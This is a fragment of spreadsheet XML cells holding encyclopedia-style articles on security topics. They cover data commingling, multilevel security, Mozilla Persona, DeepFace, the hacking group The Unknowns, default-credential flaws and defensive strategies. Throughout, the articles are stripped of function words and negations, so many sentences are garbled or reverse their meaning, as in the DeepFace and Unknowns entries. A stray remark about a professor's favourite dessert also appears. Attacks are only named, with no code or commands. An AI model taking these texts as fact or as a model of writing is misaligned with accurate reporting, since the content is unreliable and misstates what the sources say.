since hide sensitive information seen. last software risk assessment software, tool helps users monitor check network securities. references</t>
  </si>
  <si>
    <t>Data commingling</t>
  </si>
  <si>
    <t>data commingling, computer science, occurs different items kinds data stored become commonly accessible supposed remain separated. cloud computing, occur different customer data sits server. data commingled present security vulnerability.data commingling also occur high speed data transmission mixing. situation, data security level inadvertently purposely mixed data lower higher security level transmission portal. portal vehicles wire, fiber optics, microwave various radio frequency transmission portals. this commingling cause breaches security become source legal issues entity, corporation individual. data commingling also occur personal computers personal software programs used business, security, government, etc. uses. early formulation stages entities, non-profit profit corporations, llc's, llp's, etc., creation stand-alone computers stand-alone networks, "absolutely unconnected" involved individuals, easiest safest prevent data commingling. references</t>
  </si>
  <si>
    <t>Data diddling</t>
  </si>
  <si>
    <t>data diddling type cybercrime data altered entered computer system, often data entry clerk computer virus. computerized processing altered data results fraudulent benefit. cases, altered data changed back processing conceal activity. results huge. they might include adjusting financial figures marginally, could complex make entire system unusable. references</t>
  </si>
  <si>
    <t>Multiple single-level</t>
  </si>
  <si>
    <t>multiple single-level multi-security level (msl) means separate different levels data using separate computers virtual machines level. aims give benefits multilevel security without needing special changes applications, cost needing extra hardware. drive develop operating systems severely hampered dramatic fall data processing costs early 1990s. before advent desktop computing, users classified processing requirements either spend money dedicated computer hosted operating system. throughout 1990s, however, many offices defense intelligence communities took advantage falling computing costs deploy desktop systems classified operate highest classification level used organization. these desktop computers operated system high mode connected lans carried traffic level computers. implementations neatly avoided complexities traded technical simplicity inefficient space. because users classified environments also needed unclassified systems, users often least computers sometimes (one unclassified processing classification level processed). addition, computer connected appropriate classification level, meaning multiple dedicated cabling plants incorporated considerable cost terms installation maintenance). limits versus obvious shortcoming compared mls) support immixture various classification levels manner. example, notion concatenating secret data stream (taken secret file) secret data stream (read secret file) directing resultant secret data stream secret file unsupported. essence, system thought parallel (and collocated) computer systems, restricted operation one, one, security level. indeed, individual operating systems even understand concept security levels, since operate single-level systems. example, collocated configured affix character string "secret" output, understanding data compares sensitivity criticality data processed peer affixes string "unclassified" output. operating across security levels then, must methods extraneous purview "operating systems" needing human intervention, termed "manual review". example, independent monitor (not brinch hansen's sense term) provided support migration data among multiple peers (e.g., copying data file unclassified peer secret peer). although strict requirements federal legislation specifically address concern, would appropriate monitor quite small, purpose-built, supportive small number rigidly defined operations, importing exporting files, configuring output labels, maintenance/administration tasks require handling collocated peers unit rather individual, single-level systems. also appropriate utilize hypervisor software architecture, vmware, provide peer "os" form distinct, virtualized environments supported underlying accessible administrators cleared data managed peers. from users' perspectives, peer would present login display manager session logically indistinguishable underlying "maintenance user environment. advances cost complexity involved maintaining distinct networks level classification national security agency (nsa) begin research ways concept dedicated system high systems could preserved reducing physical investment demanded multiple networks computers. periods processing first advance area, establishing protocols agencies could connect computer network classification, process information, sanitize system, connect different network another classification. periods processing model offered promise single computer nothing reduce multiple cabling plants proved enormously inconvenient users; accordingly, adoption limited. 1990s, rise virtualization technology changed playing field systems. suddenly, possible create virtual machines (vms) behaved independent computers common hardware platform. with virtualization, preserve periods processing virtual level, longer needing physical system sanitized performing processing within dedicated, system-high vms. make work virtual environment, however, necessary find securely control virtual session manager ensure compromising activity directed could compromise another. solutions pursued multiple programs aimed creating viable, secure technologies leveraging virtualization. date, three major solutions materialized. "multiple independent levels security" mils, architectural concept developed john rushby combines high-assurance security separation high-assurance safety separation. subsequent refinement naval postgraduate school collaboration force research laboratory, lockheed martin, rockwell collins, objective interface systems, university idaho, boeing, raytheon, mitre resulted common criteria eal-6+ protection profile high-assurance separation kernel. "nettop", developed partnership vmware, inc., uses security-enhanced linux (selinux) base operating system technology. selinux securely holds virtual session manager, turn creates virtual machines perform processing support functions. "trusted multi-net", commercial off-the-shelf (cots) system based thin client model, developed jointly industry coalition including microsoft corporation, citrix systems, nytor technologies, vmware, inc., mitre corporation offer users access classified unclassified networks. architecture eliminates need multiple cabling plants, leveraging encryption transmit traffic cable approved highest level accessed.both nettop trusted multi-net solutions approved use. addition, trusted computer solutions developed thin-client product, originally based nettop technology concepts licensing agreement nsa. this product called secureoffice(r) trusted thin client(tm), runs lspp configuration enterprise linux version (rhel5). three competing companies implemented mils separation kernels: green hills software lynuxworks wind river systemsin addition, advances development non-virtualization systems specialized hardware, resulting least viable solution: starlight technology (now marketed interactive link system), developed australian defence science technology organisation (dsto) tenix ltd, uses specialized hardware allow users interact "low" network "high" network session within window, without data flowing "high" "low" network. philosophical aspects, ease use, flexibility interesting consider philosophical implications "solution path." rather providing abilities within classical chosen direction build "virtual peers managed, individually collective, underlying real underlying (let introduce term maintenance operating system, mos) sufficient understanding semantics prevent grievous errors, copying data secret peer unclassified peer, must ability represent labels; associate labels entities (here rigorously avoid terms "subject" "object"); compare labels (rigorously avoiding term "reference monitor"); distinguish contexts labels meaningful (rigorously avoiding term "trusted computing base" [tcb]); list goes readily perceives architecture design issues eliminated, merely deferred separate stratum software invisibly manages mandatory access control concerns superjacent strata need not. this concept none geminal architectural concept (taken anderson report) underlying dod-style trusted systems first place. what positively achieved set-of-msl-peers abstraction, albeit, radical restriction scope mac-cognizant software mechanisms small, subjacent mos. this accomplished, however, cost eliminating practical abilities, even elementary ones, secret-cleared user appends unclassified paragraph, taken unclassified file, secret report. implementation would obviously require every "reusable" resource example, unclassified file) replicated across every peer might find useful—meaning either much secondary storage needlessly expended intolerable burden cleared administrator able effect replications response users' requests therefor. course, since secret user cannot "browse" system's unclassified offerings logging beginning unclassified system afresh, evidences another severe limitation functionality flexibility.) alternatively, less sensitive file systems could nfs-mounted read-only trustworthy users could browse, modify, content. albeit, peer would actual means distinguishing (via directory listing command, e.g.) nfs-mounted resources different level sensitivity local resources, strict means preventing illegal uphill flow sensitive information brute-force, all-or-nothing mechanism read-only mounting. demonstrate handicap drastic effectuation "cross-level file sharing" actually consider case system supports unclassified, secret, secret data, secret cleared user logs system level. directory structures built around containment principle, which, loosely speaking, dictates higher sensitivity levels reside deeper tree: commonly, level directory must match dominate parent, level file (more specifically, link thereto) must match directory catalogs (this strictly true unix: alternatives support different conceptions directories, directory entries, i-nodes, etc.—such multics, adds "branch" abstraction directory paradigm—tolerate broader alternative implementations.) orthogonal mechanisms provided publicly shared spool directories, /tmp c:\temp, automatically—and invisibly—partitioned users' file access requests automatically "deflected" appropriately labeled directory partition. secret user free browse entire system, restriction that—while logged level—he allowed create fresh secret files within specific directories descendants. alternative, browsable content must specifically, laboriously replicated across applicable levels fully cleared administrator—meaning, case, secret data must replicated secret peer unclassified data must replicated secret secret peers—one readily perceive that, highly cleared user, frustrating timesharing computing experience classical trusted systems-theoretic sense—relying upon terminology concepts taken orange book, foundation trusted computing—a system supports peers could achieve level assurance beyond (b1). this (b2) criteria require, among things, clear identification perimeter existence single, identifiable entity ability authority adjudicate access data represented throughout accessible resources system. real sense, then, application term "high assurance" descriptor implementations nonsensical, since term "high assurance" properly limited (b3) (a1) systems—and, laxity albeit, (b2) systems. cross-domain solutions systems, whether virtual physical nature, designed preserve isolation different classification levels. consequently, (unlike systems), environment innate abilities move data level another. permit data sharing computers working different classification levels, sites deploy cross-domain solutions (cds), commonly referred gatekeepers guards. guards, often leverage technologies themselves, filter traffic flowing networks; unlike commercial internet firewall, however, guard built much stringent assurance requirements filtering carefully designed prevent improper leakage classified information lans operating different security levels. data diode technologies used extensively data flows required restricted direction levels, high level assurance data flow opposite direction. general, subject restrictions imposed challenges solutions: strict security assessment need provide electronic equivalent stated policy moving information classifications. (moving information classification level particularly challenging typically requires approval several different people.) late 2005, numerous high-assurance platforms guard applications approved classified environments. n.b. term "high-assurance" employed evaluated context dcid (read "dee skid three"), quasi-technical guide construction deployment various systems processing classified information, lacking precise legal rigidity orange book criteria underlying mathematical rigor. (the orange book motivated derived from, logical "chain reasoning" constructed follows: "secure" state mathematically defined, mathematical model constructed, operations upon preserve secure state conceivable sequence operations starting secure state yields secure state; mapping judiciously chosen primitives sequences operations upon model; "descriptive top-level specification" maps actions transacted user interface (such system calls) sequences primitives; stopping short either formally demonstrating live software implementation correctly implements said sequences actions; formally arguing executable, "trusted," system generated correct, reliable tools [e.g., compilers, librarians, linkers].)</t>
  </si>
  <si>
    <t>Mozilla Persona</t>
  </si>
  <si>
    <t>mozilla persona decentralized authentication system web, based open browserid protocol prototyped mozilla standardized ietf. launched july 2011, failing achieve traction, mozilla announced january 2016 plans decommission service year. history motivations persona launched july 2011 shared goals similar authentication systems like openid facebook connect, different several ways: used email addresses identifiers focused privacy intended fully integrated browser (relying heavily javascript).the privacy goal motivated fact identity provider know website user identifying first released july 2011 fully deployed mozilla websites january 2012.in march 2014, mozilla indicated dropping full-time developers persona moving project community ownership. mozilla indicated, however, plans decommission persona would maintain level involvement maintenance reviewing pull requests.persona services shut since november 2016. principles implementation persona inspired verifiedemailprotocol known browserid protocol. uses user email address identify owner. this protocol involves browser, identity provider, compliant website. browser, provider website browser stores list user verified email addresses (certificates issued identity providers), demonstrates user's ownership addresses website using cryptographic proof. certificates must renewed every hours logging identity provider (which usually mean entering email password form identity provider's site). once done, usable authenticating sites browser rest day, without entering passwords (single sign-on). decentralization aspects protocol reside theoretical support identity provider service, practice seems rely mainly mozilla's servers currently (which turn delegate email address verification, identity bridging below). however, even protocol heavily relies central identity provider, central actor knows browsers renew certificates, cannot principle monitor certificates used. identity bridging mozilla announced "identity bridging" support persona july, 2013. describe blog: "traditionally mozilla would send email click confirmation link contained. with identity bridging, persona learned trick; instead sending confirmation emails, persona verify identity email provider’s existing openid oauth gateway." this announcement included support existing users yahoo mail service. august 2013, mozilla announced support identity bridging gmail accounts. they wrote additional announcement "combined identity bridge yahoo, persona natively supports 700,000,000 active email users. that covers roughly 60–80% people north american websites." deployment persona relies heavily javascript client-side program running user's browser, making widely usable. support authentication applications persona implemented cmss drupal, serendipity, wordpress, tiki spip. there also support persona phonegap platform (used compiling html5 apps mobile apps). mozilla provides persona server persona.org. also possible persona identity provider, providing federated identity. notable sites implementing persona include ting, times crossword, voost. also learning materials related mozilla persona wikiversity (javascript login) openid webid, proposed standards identity, identification, authentication http based networks. references</t>
  </si>
  <si>
    <t>David S. Wall</t>
  </si>
  <si>
    <t>david wall frsa facss professor criminology centre criminal justice studies, school law, university leeds, england, researches teaches cybercrime, policing, organised transnational crime intellectual property crime. rejoined university leeds august 2015 durham university, professor criminology. between 2011 2014 head school applied social sciences (sass). before moving durham 2010 professor criminal justice information society university leeds, also held position head school (2005–2007) director centre criminal justice studies (2000–2005). fellow alan turing institute. favourite dessert thought panna cotta. research wall's specialist area research crime information technology, particularly regard policing cybercrime, organised crime intellectual property crime (counterfeiting). sustained track record conducting sole collaborative research projects ahrc, esrc, epsrc, nuffield, home office, society many others. currently conducting various interdisciplinary research projects cybercrime cybersecurity (riuk (formerly rcuk) various partners). first 'cybercrime cloud' critical (epsrc/esrc ep/m020576/1) (with newcastle durham universities) information northern cloud crime centre website. second 'ransomware crimes extortion' [emphasis economical, psychological societal impact ransomware] (esprc/esrc ep/p011772/1) kent, montfort, city coventry universities. third 'organized crime terror networks takedown' (horizon 2020 grant 700688)(with european universities agencies). finished projects organised crime (fp7) transcrime (università cattolica sacro cuore milan university trento)); policing cybercrime; counterfeit pharmaceuticals. recently completed partnership transcrime cnrs, (sorbonne, paris) looking "public private partnerships reducing counterfeiting fashion apparels accessories" part aegis programme framework currently working projects regarding celebrity policing cybercrime. recent publications organization cybercrime, policing cybercrime, copyright trolling, 'online micro-frauds', include, amongst offences, scareware, click fraud phishing. selection pre-print versions articles working papers found ssrn site conversation. further information found university leeds website. publications publications include books various research topics articles, chapters reports. books follows: wall, d.s. williams, m.l. (2014) (eds) policing cybercrime: networked social media technologies challenges policing, 150+x (isbn 978-1-138-02527-1) stallion, wall, d.s. (2012) british police: forces chief officers 1829 -2012, second edition, bramshill: police history society, 362. (isbn 978-0951253861) wall, d.s. (ed.) (2009) crime deviance cyberspace, aldershot: ashgate (international library criminology penology). (isbn 978-0-7546-2453-0). wall, d.s. (2007) cybercrime: transformation crime information age, cambridge: polity. 276+xii, isbn 0-7456-2735-8 (hard back), isbn 0-7456-2736-6 (paper back). wall, d.s. (ed.) (2003) cyberspace crime, aldershot: dartmouth/ ashgate (dartmouth international library criminology penology). xxvi (isbn 0-7546-2190-1). wall, d.s. (ed.) (2001) crime internet, london: routledge. (isbn 0415244293) (paper back), (0415244285) (hard back). ryan, savage, wall. d.s. (eds) (2001) policy networks criminal justice, london: palgrave macmillan, (isbn 750241). akdeniz, walker, c.p. wall. d.s. (eds) (2000) internet, society, london: longman, (isbn 0582356563). stallion, wall, d.s. (1999) british police: police forces chief officers 1829 -2000, bramshill: police history society, (isbn 0-9512538-4-0). wall, d.s. (1998) chief constables england wales: socio-legal history criminal justice elite, aldershot: dartmouth, (isbn 1-85521-714-7). young, wall, d.s. (eds) (1996) access criminal justice: legal aid, lawyers defence liberty, london: blackstone press, +xiv (isbn 1-85431-502-1). bottomley, a.k. coleman, dixon, gill, m.l. wall, d.s. (1991) impact pace: policing northern force, hull: hull university, (isbn 0-85958-726-6).wall currently editorial board european journal criminal policy research (springer) security journal (palgrave). previously editorial board british journal criminology (oxford university press), policing society (taylor francis), criminal justice matters (taylor francis). associate editor international review law, computers technology (taylor francis). other works aside work cybercrimes criminal justice, wall also interest popular cultures. played bass fabulous salamanders 1980s folk rock group god's little monkeys (formerly malcolm's interview) recorded albums: breakfast bedlam (topic records, 1988); maps hell (cooking vinyl, 1989); (cooking vinyl, 1991). within academic portfolio work written articles celebrity cultures intellectual property rights. example, wall, david (2003). "policing elvis: legal action shaping post-mortem celebrity culture contested space" (pdf). entertainment sports law, (3): 35–69. recent research explores intellectual property driver deviant criminal behaviours, "the theft ideas cybercrime". references external links page university leeds website</t>
  </si>
  <si>
    <t>Daxin (spyware)</t>
  </si>
  <si>
    <t>daxin backdoor exploit discovered late 2021 symantec researchers. considered highly sophisticated suspected operational espionage operations chinese government decade, targeting government agencies asia africa. controlled anywhere world, creators reportedly invested significant effort make communication blend network traffic. references</t>
  </si>
  <si>
    <t>DeepFace</t>
  </si>
  <si>
    <t>deepface deep learning facial recognition system created research group facebook. identifies human faces digital images. program employs nine-layer neural network million connection weights trained four million images uploaded facebook users. facebook research team stated deepface method reaches accuracy 97.35% 0.25% labeled faces wild (lfw) data human beings 97.53%. this means deepface sometimes successful human beings. result growing societal concerns meta announced plans shut facebook facial recognition system, deleting face scan data billion users. this change represent largest shifts facial recognition usage technology’s history. facebook planned delete december 2021 billion facial recognition templates, digital scans facial features. however, plan eliminate deepface software powers facial recognition system. company also ruled incorporating facial recognition technology future products, according meta spokesperson. commercial rollout origin deepface produced collection scientists facebook’s artificial intelligence research team. team includes yainiv taigman facebook research scientist ming yang. they also joined lior wolf, faculty member aviv university. yaniv taigman, came facebook facebook acquired face.com 2007. facebook started rolling deepface users early 2015, continuously expanding deepface's software,. deepface, according director facebook’s artificial intelligence research, intended invade individual privacy. instead, deepface alerts individuals face appears photo posted facebook. when receive notification, option removing face photo. european union when deepface technology initially deployed, users option turn deepface off. however, notified because this, deepface released european union. data privacy argued facebook’s facial recognition comply data protection laws. because users consent uses biometric data, comply. accuracy deepface systems identify faces accuracy, almost accuracy human position. facebook’s facial recognition effective fbi’s technology, accuracy. google’s technology, facenet successful deepface using data sets. facenet record accuracy, 99.63%. google’s facenet incorporates data google photos. applications facebook uses individual facial recognition templates find photos individual review, engage, share content. deepface protects individuals impersonation identity theft. take, example, instance individual used someone’s profile photo own. through deepface, facebook identify alert person whose information misused. ensure individuals control facial recognition, facebook share facial templates. additionally, facebook remove images facial recognition templates someone deleted account untagged themself photo. individuals also ability turn facial recognition facebook. feature turned off, facebook cease facial recognition individual. following release deepface 2015, uses remained fairly stagnant. because individuals uploaded images facebook, algorithm gotten accurate. facebook’s deepface largest facial recognition dataset currently exists. because this, individuals argue facebook’s facial database could distributed government agencies. these uses, however, would prohibited data privacy laws. response privacy concerns, facebook removed automatic facial recognition feature allowing individuals tagging deepface. this change implemented 2019. architecture deepface system consists four modules: alignment, alignment, frontalization, neural network. image face passed sequence, resulting 4096-dimensional feature vector representing face. feature vector processed many different tasks. example, identify face, compare list feature vectors known faces, identify face similar feature vector. deepface uses fiducial point detectors based existing databases direct alignment faces. facial alignment begins alignment, continues alignment frontalization. that deepface’s process steps. first, corrects angles image face photo looking forward. accomplish this, uses model face. alignment alignment module detects fiducial points detected face center eyes, nose mouth location. these points translated onto warped image help detect face. however, transformation fails compensate rotations place. alignment order align faces, deepface uses generic model wherein images cropped versions. image fiducial points. after image warped, anchor points manually placed image match fiducial points. 3d-to-2d camera fitted minimizes losses. because detected points contour face inaccurate, step important. frontalization because full perspective projections modeled, fitted camera approximation individual's actual face. reduce errors, deepface aims warp images smaller distortions. also, thee camera capable replacing parts image blending symmetrical counterparts. neural network neural network sequence layers, arranged follows: convolutional layer pooling convolutional layer locally connected layers fully connected layer. input image face, scaled resolution {\displaystyle 152\times 152} output real vector dimension 4096, feature vector face image. 2014 paper, additional fully connected layer added classify face image 4030 possible persons network seen training time. reactions industry researcher goertzel said facebook "pretty convincingly solved face recognition" project, said would incorrect conclude deep learning entire solution neeraj kumar, researcher university washington said facebook’s deepface shows large sets outside data result "higher capacity" model. because facebook's wide access images individuals, facial recognition software perform better software much smaller data sets. media huffington post piece called technology "creepy", citing data privacy concerns, noted european governments already required facebook delete facial-recognition data. according broadcasting cable, facebook google invited center digital democracy attend 2014 national telecommunications information administration "stakeholder meeting" help develop consumer privacy bill rights, declined. broadcasting cable also noted facebook released press announcements concerning deepface, although research paper published earlier month. slate said deepface publicized facebook wary another round headlines decrying deepface's creepiness. users many individuals fear facial recognition technology. technology's nearly perfect accuracy allows social media companies create digital profiles millions americans. however, individual's fear facial recognition privacy concerns correspond decrease social media use. instead, attitudes towards privacy privacy settings large impact individual's intention facebook apps. because facebook social media site, individual fears privacy ruled desire participate social media. privacy concerns bipa lawsuit facebook users raised class action lawsuit facebook illinois biometric information privacy (bipa). illinois comprehensive biometric privacy legislation, regulating collection biometric information commercial entities. illinois' bipa requires corporation obtains person's biometric information obtain written release, provide notice information collected, state duration information collected. lawsuit raised deepface alleges facebook's collection facial identification information purpose suggestion tool violates bipa. because facebook give notice consent individuals tool, facebook users argue violates bipa. ninth circuit denied facebook's motion dismiss case ultimately certified case. facebook sought appeal certification ninth circuit decision ultimately granted. facebook claims case verified plaintiffs alleged harm beyond facebook’s violation bipa. facebook removed automatic facial recognition tagging feature 2019, response concerns raised lawsuit. facebook proposed $550 million settlement case, rejected. when facebook increased settlement $650 million, court accepted facebook ordered $650 million settlement early march 2021. million residents illinois receive least $345 dollars.in july 2020, facebook announced building teams look racism algorithms. facebook's teams work facebook's responsible team study bias systems. implementation programs recent, still unclear reforms made. ten-year challenge 2019, facebook challenge went viral asking users post photo years 2019. challenge coined year challenge." more million people participated challenge, including many celebrities. worry arose facebook's year challenge designed train facebook's facial recognition database. kate o'neill, writer wired, wrote op-ed echoed possibility. facebook denied played role generating challenge. however, individuals argued concerns underscore theories around year challenge echoed broader concerns facebook right privacy. racism facial identification technology facial recognition algorithms universally successful. while algorithms capable classifying faces accuracy cases, accuracy lower algorithms pled women, black individuals, young people. systems falsely identify black asian faces times white faces. because algorithms primarily trained white men, systems like deepface difficult time identifying them. projected facial recognition data bases trained identify people color exposing diverse faces successful identification. also criticism facebook biometric information privacy references further reading yaniv taigman; ming yang; marc'aurelio ranzato; lior wolf (june 2014), "deepface: closing human-level performance face verification", conference computer vision pattern recognition (cvpr), facebook research group john bohannon february 2015), "facebook soon able photo", science (website), american association advancement science, doi:10.1126/science.aaa7804</t>
  </si>
  <si>
    <t>The Unknowns</t>
  </si>
  <si>
    <t>unknowns self-proclaimed ethical hacking group came attention 2012 exploiting weaknesses security nasa, cia, white house, european space agency, harvard university, renault, united states military joint pathology center, royal thai navy, several ministries defense. group posted reasons attacks sites anonpaste pastebin including link compressed file contained files obtained military sites breached. unknowns claim "... goal never harm anyone, want make whole internet world secured because, simply, want help." group claims ethical hacking activities, nonetheless lifted internal documents victims, posting online. they claim reported security holes many victims, receive response back them. whole point show government-run sites loopholes code anyone exploit them. group used methods like advanced injection gain access victim websites. nasa confirmed attack. they claimed affected systems taken offline since patched. time wanted hacking groups europe also wanted fbi, although refused tell investigating hacks. members team core members: pixiedust, founder, spokesperson, leader, p-teo, programmer fabien léac,a french researcher computer faults white hacker mrsecurity, black-hat hacker, programmer ghostwriter unknowns netrox, black-hat hacker, penetration tester researcher. joined team late 2015 team reunited. jail zyklon lives france, arrested french intelligence service june 2012. later released sixteen years time. trials taking place 2014 supposedly. life related book written mother sophie léac l'histoire vraie d'un jeune hacker français october 2013) true story french teen-hacker. second book preparation: hack! there cyberwar!. hacked websites applications group hacked many websites applications using series different attacks. notable, however, injection. there companies affected group, hacks even companies make media (probably keeping multi-country legal investigation secret). however, notable hacks done unknowns, mostly government related websites, make mass media. group still active, members still working together, make internet safer. injection attacks used following: asian college technology bahrain defense force california state university christian mingle deutsche federal government european space agency eset french ministry defense harvard university jordanian yellow pages lawrence livermore national laboratory united states navy nasa ames research center glenn research center new7wonders renault royal thai navy sempra energy social democratic party germany united kingdom ministry defense university rhode island united states military united states force united states department commerce united states department treasury paypal, information released. unknown contacted paypal exploits he/she found received $1,000 reward.however used different attacks: united kingdom police servers exploited root access gained systems. much known attack. abolished purpose unknowns find security issues high-profiled websites patched. information hacked sites released unknowns attempted make contact targets informing security issues, receive response back websites targeted. some data leaked force websites patch systems. after period hacking high-profile websites, unknown disbanded group 2012 reunited early 2015. references list hacked websites/companies</t>
  </si>
  <si>
    <t>Default Credential vulnerability</t>
  </si>
  <si>
    <t>default credential vulnerability type vulnerability computing device commonly affects devices pre-set (default) administrative credentials access configuration settings. vendor manufacturer devices uses single pre-defined admin credentials access device configurations, potential hacker misuse fact hack devices, credentials changed consumers. examples there several proof-of-concept (poc), well real world worms running across internet, configured search systems default username password. voyager alpha force, zotob, myspooler examples malware scan internet specific devices, login using default credentials.in real world, many forms malware, mirai, used vulnerability. once devices compromised exploiting default credential vulnerability, used various harmful purposes, carrying distributed denial service (ddos) attacks. particular incident, hacker able gain access control large number networks including university maryland, baltimore county, imagination, capital market strategies leveraging fact using default credentials netgear switch. references also attack (computing) threat (computer)</t>
  </si>
  <si>
    <t>Defense Red Switch Network</t>
  </si>
  <si>
    <t>defense switch network (drsn) dedicated telephone network provides global secure communication services command control structure united states armed forces. network maintained defense information systems agency (disa) secured communications level secret sci. drsn provides multilevel secure voice voice-conferencing capabilities national command authority (nca, president secretary defense united states), joint chiefs staff, national military command center (nmcc), combatant commanders command centers, warfighters, agencies, government departments, nato allies. department defense federal government agencies access network approval joint staff. upon approval joint staff, disa work customer appropriate military department arrange service.the defense switch network consists four major subsystems: switching subsystem, transmission subsystem, timing synchronization subsystem, network management subsystem. switching subsystem uses black switches provide integrated red/black service. users provided single telephone instrument access secure nonsecure networks. drsn carried around 15,000 calls prior september 2001. drsn usage subsequently peaked 45,000 calls mid-2003 running around 25,000 calls day. period defense switch network expanded support additional federal homeland defense initiatives.nowadays, network also called multilevel secure voice service. it's core global secure voice system (gsvs) peacetime, crisis time conventional war, hosting national-level conferencing connectivity requirements providing interoperability tactical strategic communication networks. also defense switched network (dsn) automatic secure voice communications network (autosevocom) references external links globalsecurity.org: defense switch network (drsn)</t>
  </si>
  <si>
    <t>Defense in depth (computing)</t>
  </si>
  <si>
    <t>defense depth concept used information security multiple layers security controls (defense) placed throughout information technology (it) system. intent provide redundancy event security control fails vulnerability exploited cover aspects personnel, procedural, technical physical security duration system's life cycle. background idea behind defense depth approach defend system particular attack using several independent methods. layering tactic, conceived national security agency (nsa) comprehensive approach information electronic security. term defense depth computing inspired military strategy name, quite different concept. military strategy revolves around weaker perimeter defense intentionally yielding space time, envelop, ultimately counter-attack opponent, whereas information security strategy simply involves multiple layers controls, intentionally ceding ground (cf. honeypot.) controls defense depth divided three areas: physical, technical, administrative. physical physical controls anything physically limits prevents access systems. fences, guards, dogs, cctv systems like. technical technical controls hardware software whose purpose protect systems resources. examples technical controls would disk encryption, file integrity software, authentication. hardware technical controls differ physical controls prevent access contents system, physical systems themselves. administrative administrative controls organization's policies procedures. their purpose ensure proper guidance available regard security regulations met. they include things hiring practices, data handling procedures, security requirements. methods using following layers constitutes example defense depth. system application antivirus software authentication password security encryption hashing passwords logging auditing multi-factor authentication vulnerability scanners timed access control internet security awareness training sandboxing intrusion detection systems (ids) network firewalls (hardware software) demilitarized zones (dmz) virtual private network (vpn) physical biometrics data-centric security physical security (e.g. deadbolt locks) example following scenario browser developed using defense depth browser developers receive security training codebase checked automatically using security analysis tools browser regularly audited internal security team occasionally audited external security team executed inside sandbox also defence-in-depth (roman military) defense strategy (computing) references</t>
  </si>
  <si>
    <t>Defense strategy (computing)</t>
  </si>
  <si>
    <t>computing, defense strategy concept practice used computer designers, users, personnel reduce computer security risks. common strategies boundary protection boundary protection employs security measures devices prevent unauthorized access computer systems (referred controlling system border). approach based assumption attacker penetrate system. examples strategy include using gateways, routers, firewalls, password checks, deleting suspicious emails/messages, limiting physical access. boundary protection typically main strategy computing systems; type defense successful, strategies required. this resource-consuming strategy known scope. external information system monitoring part boundary protection. information system monitoring information system monitoring employs security measures find intruders damage done them. this strategy used system penetrated, intruder gain full control. examples strategy include antivirus software, applying patch, network behavior anomaly detection. this strategy's success based competition offence defence. this time resource-consuming strategy, affecting performance. scope variable time. cannot fully successful supported strategies. unavoidable actions unavoidable actions employ security measures cannot prevented neutralized. this strategy based assumption system penetrated, intruder cannot prevent defensive mechanism employed. examples strategy include rebooting, using physical unclonable functions, using security switch. secure enclave secure enclave strategy employs security measures prevent access parts system. this strategy used system penetrated, intruder cannot access special parts. examples strategy include using access level, using trusted platform module, using microkernel, using diode (unidirectional network device), using gaps. this supporting strategy boundary protection, information system monitoring unavoidable action strategies. this time resource-consuming strategy known scope. even strategy fully successful, guarantee overall success larger defense strategy. false target false target strategy deploys non-real targets intruder. used system penetrated, intruder know system architecture. examples strategy include honeypots, virtual computers, virtual security switches, fake files, address/password copies. this supporting strategy information system monitoring. time-consuming strategy, scope determined designer. cannot fully successful supported strategies. moving target moving target security strategy based frequent changes data processes. this strategy based assumption system penetrated, intruder know architecture system processes. examples strategy regular changes passwords keys (cryptography), using dynamic platform, etc. this supporting strategy information system monitoring. time-consuming strategy, scope determined designer. cannot fully successful supported strategies. actions activated scheduled basis response detected threat. useless information useless information comprises security measures turn important information useless data intruder. strategy based assumption system penetrated, intruder able decrypt information, enough time decrypt example, encrypting file system using encryption software render data useless even attacker gets access file system, using data masking, sensitive data hidden non-sensitive data modified content. this supporting strategy information system monitoring. time resource-consuming strategy, affecting performance. scope known. cannot successful supported strategies. claude shannon's theorems show encryption smaller secured information, information-theoretic security achieved. there known unbreakable cryptographic system: one-time pad. this strategy generally possible difficulties involved exchanging one-time pads without risk compromised. other cryptographic systems buying time broken (see cryptographic hash function#degree_of_difficulty). this strategy needs supported moving target deletes strategies. deletion deletion strategy using security measures prevent intruder gaining sensitive information costs. strategy based assumption damage information disclosure would greater damage caused deleting information disabling system required gain access information. strategy part data-centric security approach. examples strategy include information deletion response security violation (such unauthorized access attempts) password resets. this supporting strategy information system monitoring. resource-consuming strategy, scope determined designer. cannot fully successful since detected intrusion quarantined. information redundancy information redundancy strategy performing security measures keep redundancy information using case damage. strategy based assumption finding repairing damage complicated restoration system. examples strategy include using system restoration, keeping backup files, using backup computer. this supporting strategy information system monitoring. this strategy consumes considerable resources, scope known. fully successful part. limiting actions made robot limiting actions made robot strategy performing security measures limit robot's (software bot) actions. strategy based assumption robot take actions, create damage human cannot create. examples strategy include using anti-spam techniques, using captcha human presence detection techniques, using dds-based defense (protection denial-of-service attack). this supporting strategy boundary protection information system monitoring. time resource-consuming strategy, scope determined designer. this strategy cannot fully successful own. active defense active defense strategy performing security measures attacking potential intruders. strategy based assumption potential intruder attack fewer abilities. examples strategy include creating using lists trusted networks, devices, applications, blocking untrusted addresses, vendor management. this supporting strategy boundary protection information system monitoring. time resource-consuming strategy, scope determined designer. this strategy cannot fully successful own. unavoidable actions this strategy support strategy. this resource-consuming strategy, scope determined designer. implementation wide impact devices. this strategy fully successful, cases, trade-off full system functionality security. this strategy used proactively reactively. actions done response already detected problem late. implementation needs supported secure enclave strategy order prevent neutralizing action unauthorized access protection mechanism. actions following types: preventive actions blocking certain functions, signals, peripheral devices, memory parts, and/or data transfers. example: blocking audio/video recording, sending long messages, secret memory access. creative actions activating certain functions, sending signals, messages, and/or data. example: sending alarm signal message, activating data copying transfer. modification actions modifying peripheral device's functioning, modifying data, signals processes defended system. example, independent hardware encryption/decryption, changing accelerometer accuracy, filtering messages words, changing state diagram algorithm independent hardware. also strong cryptography references</t>
  </si>
  <si>
    <t>Defensive computing</t>
  </si>
  <si>
    <t>defensive computing form practice computer users help reduce risk computing problems, avoiding dangerous computing practices. primary goal method computing able anticipate prepare potentially problematic situations prior occurrence, despite adverse conditions computer system mistakes made users. this achieved adherence variety general guidelines, well practice specific computing techniques. strategies defensive computing could divided categories, network security backup restoration data. network security users computers risk accessing internet networks. either allows others gain access user's system important information. implementing certain strategies, defensive users reduce risk associated network access. firewall firewall collection security measures protects computer harmful inbound outbound traffic internet prevents unauthorized access computer systems. these security measures integrated form special software runs autonomously either individual computer systems, externally built software within routers modems. firewall software protect computers sending unauthorized harmful outbound traffic. important defensive computing strategy seek implement quality firewall software filters inbound outbound traffic. anti-malware software basic strategy defensive computer users install anti-malware software. firewalls completely protect computer. malicious software able firewall onto system. anti-malware anti-virus, anti-phishing email filtering software offer protection harmful software reside within computer. amount malicious software available internet steadily increasing. important defensive users anti-malware effective easily updated order combat strains malicious software developed.the side anti malware contains serious vulnerabilities 